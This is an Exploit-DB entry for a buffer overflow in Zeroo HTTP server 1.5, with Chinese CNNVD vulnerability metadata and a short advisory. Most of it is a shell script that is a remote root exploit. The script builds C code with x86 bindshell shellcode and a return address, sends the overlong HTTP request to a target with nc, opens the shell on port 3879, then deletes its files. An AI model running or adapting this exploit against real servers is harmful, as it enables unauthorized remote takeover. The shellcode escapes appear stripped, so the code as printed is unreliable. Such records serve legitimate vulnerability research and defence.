https://www.exploit-db.com/exploits/22021
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-317

ZerooHTTPserver1.5版本HttpGetRequest函数存在缓冲区溢出漏洞。远程攻击者借助超长HTTP请求执行任意代码。

source: http://www.securityfocus.com/bid/6190/info

Zeroo HTTP server is a freely available, open source web server. It is available for the Linux and Microsoft Windows platforms.

It has been reported that Zeroo HTTP server does not sufficiently check bounds on some requests. This occurs when a string of excessive length is received by the server. This can result in the overwriting of stack memory, and potential code execution. 

#!/bin/sh
#
# 0x82-Zer00.sh Zeroo HTTP Server Remote root exploit for Linux
#
# __
# exploit by "you dong-hun"(Xpl017Elz), <[email protected]>.
# My World: http://x82.i21c.net
#
(printf "n 0x82-Zer00.sh Zeroo HTTP Server Remote root exploit");
(printf "n                                by x82 in INetCop(c)nn");
#
if [ "$2" = "" ]; then
(printf " Usage: 0x82-Zer00.sh [hostname] [port]nn");
exit; fi
#
cat >0x82-Remote-Zeroosubugxpl.c<< X82X82
#define Xpl017Elz x82
int main(/* args? */) {
    int num;
    char b1ndsh[] = /* Linux(x86) bindshell on port 3879 */
        "x89xe5x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8"
        "x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89"
        "x45xf4x43x66x89x5dxecx66xc7x45xeex0fx27x89x4dxf0"
        "x8dx45xecx89x45xf8xc6x45xfcx10x89xd0x8dx4dxf4xcd"
        "x80x89xd0x43x43xcdx80x89xd0x43xcdx80x89xc3x31xc9"
        "xb2x3fx89xd0xcdx80x89xd0x41xcdx80xebx18x5ex89x75"
        "x08x31xc0x88x46x07x89x45x0cxb0x0bx89xf3x8dx4dx08"
        "x8dx55x0cxcdx80xe8xe3xffxffxff/bin/sh";
    for(num=0;num<0xa4;num+=4)
        printf("xc0xf4xffxbf"); // this's &shellcode
    for(num=0;num<0x02a8-strlen(b1ndsh);num++)
        printf("N"); /* nop...NNNNNNNNNNNNN...NNNNNNNNNNNNN;;; */
    printf("%s",b1ndsh); /* shellcode */
    for(num=0;num<0xb4;num++)
    printf("xff"); /* byteother */
    printf("rn");
}
X82X82
#
(printf " { 0x00. Compile exploit. }n");
make 0x82-Remote-Zeroosubugxpl
(printf " { 0x01. Send code ! }n");
(./0x82-Remote-Zeroosubugxpl;cat)|nc $1 $2 &
(printf " { 0x02. OK, Try $1:3879 ... }n");
nc $1 3879
(printf " { 0x03. Connection closed. }n");
#
(printf " { 0x04. Delete exploit code. }n");
rm -f 0x82-Remote-Zeroosubugxpl*
(printf " { 0x05. End :-}nn");
#

来源:BUGTRAQ
名称:20021116RemoteBufferOverflowvulnerabilityinZerooHTTPServer.
链接:http://online.securityfocus.com/archive/1/300066
来源:BID
名称:6190
链接:http://www.securityfocus.com/bid/6190
来源:XF
名称:zeroo-http-server-bo(10642)
链接:http://www.iss.net/security_center/static/10642.php